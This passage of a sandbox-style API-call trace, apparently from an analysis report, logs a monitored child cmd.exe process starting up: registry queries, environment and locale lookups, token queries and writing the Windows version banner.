nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.910] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353e1ac | out: lpFindFileData=0x353e1ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84234950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844b1ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844b1ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd47, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_128.png", cAlternateFileName="")) returned 1 Thread: id = 23 os_tid = 0xb18 Thread: id = 26 os_tid = 0xb28 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4ee98000" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa90" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0xaa0 [0032.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fb60 | out: lpSystemTimeAsFileTime=0x18fb60*(dwLowDateTime=0x3bebf9b0, dwHighDateTime=0x1d5351d)) [0032.155] GetCurrentProcessId () returned 0xa9c [0032.155] GetCurrentThreadId () returned 0xaa0 [0032.156] GetTickCount () returned 0x181fb [0032.156] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb68 | out: lpPerformanceCount=0x18fb68*=15234611798) returned 1 [0032.156] GetModuleHandleW (lpModuleName=0x0) returned 0x4a1e0000 [0032.156] __set_app_type (_Type=0x1) [0032.157] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a207810) returned 0x0 [0032.157] __getmainargs (in: _Argc=0x4a22a608, _Argv=0x4a22a618, _Env=0x4a22a610, _DoWildCard=0, _StartInfo=0x4a20e0f4 | out: _Argc=0x4a22a608, _Argv=0x4a22a618, _Env=0x4a22a610) returned 0 [0032.157] GetCurrentThreadId () returned 0xaa0 [0032.157] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaa0) returned 0x3c [0032.158] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0032.158] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0032.158] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.158] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0032.158] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18faf8 | out: phkResult=0x18faf8*=0x0) returned 0x2 [0032.158] VirtualQuery (in: lpAddress=0x18fae0, lpBuffer=0x18fa60, dwLength=0x30 | out: lpBuffer=0x18fa60*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.158] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fa60, dwLength=0x30 | out: lpBuffer=0x18fa60*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.158] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fa60, dwLength=0x30 | out: lpBuffer=0x18fa60*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.158] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18fa60, dwLength=0x30 | out: lpBuffer=0x18fa60*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.158] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fa60, dwLength=0x30 | out: lpBuffer=0x18fa60*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0032.158] GetConsoleOutputCP () returned 0x1b5 [0032.158] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a21bfe0 | out: lpCPInfo=0x4a21bfe0) returned 1 [0032.159] SetConsoleCtrlHandler (HandlerRoutine=0x4a203184, Add=1) returned 1 [0032.159] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.159] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0032.159] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.159] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a20e194 | out: lpMode=0x4a20e194) returned 0 [0032.159] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.159] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a20e198 | out: lpMode=0x4a20e198) returned 0 [0032.159] GetEnvironmentStringsW () returned 0x298a60* [0032.160] GetProcessHeap () returned 0x280000 [0032.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa7c) returned 0x2994f0 [0032.160] FreeEnvironmentStringsW (penv=0x298a60) returned 1 [0032.160] GetProcessHeap () returned 0x280000 [0032.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x8) returned 0x2988e0 [0032.160] GetEnvironmentStringsW () returned 0x298a60* [0032.160] GetProcessHeap () returned 0x280000 [0032.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa7c) returned 0x299f80 [0032.160] FreeEnvironmentStringsW (penv=0x298a60) returned 1 [0032.160] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e9b8 | out: phkResult=0x18e9b8*=0x44) returned 0x0 [0032.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x0, lpData=0x18e9d0*=0x18, lpcbData=0x18e9b4*=0x1000) returned 0x2 [0032.160] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x4, lpData=0x18e9d0*=0x1, lpcbData=0x18e9b4*=0x4) returned 0x0 [0032.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x0, lpData=0x18e9d0*=0x1, lpcbData=0x18e9b4*=0x1000) returned 0x2 [0032.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x4, lpData=0x18e9d0*=0x0, lpcbData=0x18e9b4*=0x4) returned 0x0 [0032.160] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x4, lpData=0x18e9d0*=0x40, lpcbData=0x18e9b4*=0x4) returned 0x0 [0032.160] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x4, lpData=0x18e9d0*=0x40, lpcbData=0x18e9b4*=0x4) returned 0x0 [0032.160] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x0, lpData=0x18e9d0*=0x40, lpcbData=0x18e9b4*=0x1000) returned 0x2 [0032.160] RegCloseKey (hKey=0x44) returned 0x0 [0032.161] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e9b8 | out: phkResult=0x18e9b8*=0x44) returned 0x0 [0032.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x0, lpData=0x18e9d0*=0x40, lpcbData=0x18e9b4*=0x1000) returned 0x2 [0032.161] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x4, lpData=0x18e9d0*=0x1, lpcbData=0x18e9b4*=0x4) returned 0x0 [0032.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x0, lpData=0x18e9d0*=0x1, lpcbData=0x18e9b4*=0x1000) returned 0x2 [0032.161] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x4, lpData=0x18e9d0*=0x0, lpcbData=0x18e9b4*=0x4) returned 0x0 [0032.161] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x4, lpData=0x18e9d0*=0x9, lpcbData=0x18e9b4*=0x4) returned 0x0 [0032.161] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x4, lpData=0x18e9d0*=0x9, lpcbData=0x18e9b4*=0x4) returned 0x0 [0032.161] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e9b0, lpData=0x18e9d0, lpcbData=0x18e9b4*=0x1000 | out: lpType=0x18e9b0*=0x0, lpData=0x18e9d0*=0x9, lpcbData=0x18e9b4*=0x1000) returned 0x2 [0032.161] RegCloseKey (hKey=0x44) returned 0x0 [0032.161] time (in: timer=0x0 | out: timer=0x0) returned 0x5d2282b7 [0032.161] srand (_Seed=0x5d2282b7) [0032.161] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0032.161] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0032.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a21c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.161] GetProcessHeap () returned 0x280000 [0032.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x29aa10 [0032.161] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0032.162] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.162] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.162] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0032.162] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0032.162] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0032.162] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0032.162] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0032.162] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0032.162] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0032.162] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0032.162] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0032.162] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0032.162] GetProcessHeap () returned 0x280000 [0032.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2994f0 | out: hHeap=0x280000) returned 1 [0032.162] GetEnvironmentStringsW () returned 0x298a60* [0032.162] GetProcessHeap () returned 0x280000 [0032.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa94) returned 0x29ac30 [0032.162] FreeEnvironmentStringsW (penv=0x298a60) returned 1 [0032.162] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.162] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a20f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0032.162] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0032.162] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0032.162] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0032.162] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0032.162] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0032.162] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0032.162] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0032.162] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0032.162] GetProcessHeap () returned 0x280000 [0032.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x5c) returned 0x29b6d0 [0032.162] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f7c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.163] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f7c0, lpFilePart=0x18f7a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f7a0*="Desktop") returned 0x25 [0032.163] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.163] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f4d0 | out: lpFindFileData=0x18f4d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x29b740 [0032.163] FindClose (in: hFindFile=0x29b740 | out: hFindFile=0x29b740) returned 1 [0032.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f4d0 | out: lpFindFileData=0x18f4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x29b740 [0032.163] FindClose (in: hFindFile=0x29b740 | out: hFindFile=0x29b740) returned 1 [0032.163] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0032.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f4d0 | out: lpFindFileData=0x18f4d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x365b3b50, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x365b3b50, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x29b740 [0032.163] FindClose (in: hFindFile=0x29b740 | out: hFindFile=0x29b740) returned 1 [0032.163] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.163] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0032.163] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0032.163] GetProcessHeap () returned 0x280000 [0032.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ac30 | out: hHeap=0x280000) returned 1 [0032.163] GetEnvironmentStringsW () returned 0x29b740* [0032.164] GetProcessHeap () returned 0x280000 [0032.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xae8) returned 0x29c230 [0032.164] FreeEnvironmentStringsW (penv=0x29b740) returned 1 [0032.164] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a21c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.164] GetProcessHeap () returned 0x280000 [0032.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b6d0 | out: hHeap=0x280000) returned 1 [0032.164] GetProcessHeap () returned 0x280000 [0032.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4016) returned 0x29cd20 [0032.164] GetProcessHeap () returned 0x280000 [0032.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd20 | out: hHeap=0x280000) returned 1 [0032.164] GetConsoleOutputCP () returned 0x1b5 [0032.164] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a21bfe0 | out: lpCPInfo=0x4a21bfe0) returned 1 [0032.164] GetUserDefaultLCID () returned 0x409 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a217b50, cchData=8 | out: lpLCData=":") returned 2 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f8d0, cchData=128 | out: lpLCData="0") returned 2 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f8d0, cchData=128 | out: lpLCData="0") returned 2 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f8d0, cchData=128 | out: lpLCData="1") returned 2 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a22a740, cchData=8 | out: lpLCData="/") returned 2 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a22a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a22a460, cchData=32 | out: lpLCData="Tue") returned 4 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a22a420, cchData=32 | out: lpLCData="Wed") returned 4 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a22a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a22a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a22a360, cchData=32 | out: lpLCData="Sat") returned 4 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a22a700, cchData=32 | out: lpLCData="Sun") returned 4 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a217b40, cchData=8 | out: lpLCData=".") returned 2 [0032.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a22a4e0, cchData=8 | out: lpLCData=",") returned 2 [0032.165] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0032.166] GetProcessHeap () returned 0x280000 [0032.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20c) returned 0x2995c0 [0032.166] GetConsoleTitleW (in: lpConsoleTitle=0x2995c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.166] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.166] GetFileType (hFile=0xf4) returned 0x3 [0032.166] BrandingFormatString () returned 0x2997e0 [0032.178] GetVersion () returned 0x1db10106 [0032.178] _vsnwprintf (in: _Buffer=0x18fa40, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x18f9d8 | out: _Buffer="6.1.7601") returned 8 [0032.178] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.178] GetFileType (hFile=0xf4) returned 0x3 [0032.178] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a226340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0032.179] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a226340, nSize=0x2000, Arguments=0x18f9e0 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0032.179] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.179] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0032.179] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x18f968, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f968*=0x24, lpOverlapped=0x0) returned 1 [0032.179] _vsnwprintf (in: _Buffer=0x4a226340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18fa08 | out: _Buffer="\r\n") returned 2 [0032.179] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.179] GetFileType (hFile=0xf4) returned 0x3 [0032.179] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.179] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.179] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f9d8, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f9d8*=0x2, lpOverlapped=0x0) returned 1 [0032.179] _vsnwprintf (in: _Buffer=0x4a226340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x18fa08 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0032.179] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.179] GetFileType (hFile=0xf4) returned 0x3 [0032.179] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.179] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0032.179] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x18f9d8, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f9d8*=0x3f, lpOverlapped=0x0) returned 1 [0032.179] _vsnwprintf (in: _Buffer=0x4a226340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18fa08 | out: _Buffer="\r\n") returned 2 [0032.179] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.179] GetFileType (hFile=0xf4) returned 0x3 [0032.179] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.179] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a21c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.179] WriteFile (in: hFile=0xf4, lpBuffer=0x4a21c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f9d8, lpOverlapped=0x0 | out: lpBuffer=0x4a21c320*, lpNumberOfBytesWritten=0x18f9d8*=0x2, lpOverlapped=0x0) returned 1 [0032.179] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0032.180] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0032.180] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0032.180] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0032.180] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.180] GetFileType (hFile=0xe8) returned 0x3 [0032.180] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0032.180] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x18f830 | out: TokenHandle=0x18f830*=0x0) returned 0xc000007c [0032.180] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x18f830 | out: TokenHandle=0x18f830*=0x50) returned 0x0 [0032.180] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x18f840, TokenInformationLength=0x4, ReturnLength=0x18f848 | out: TokenInformation=0x18f840, ReturnLength=0x18f848) returned 0x0 [0032.180] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x18f848, TokenInformationLength=0x4, ReturnLength=0x18f840 | out: TokenInformation=0x18f848, ReturnLength=0x18f840) returned 0x0 [0032.180] NtClose (Handle=0x50) returned 0x0 [0032.180] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x18f810, nSize=0x0, Arguments=0x18f818 | out: lpBuffer="\x97e0\x29") returned 0xf [0032.180] GetProcessHeap () returned 0x280000 [0032.180] RtlAllocateHeap 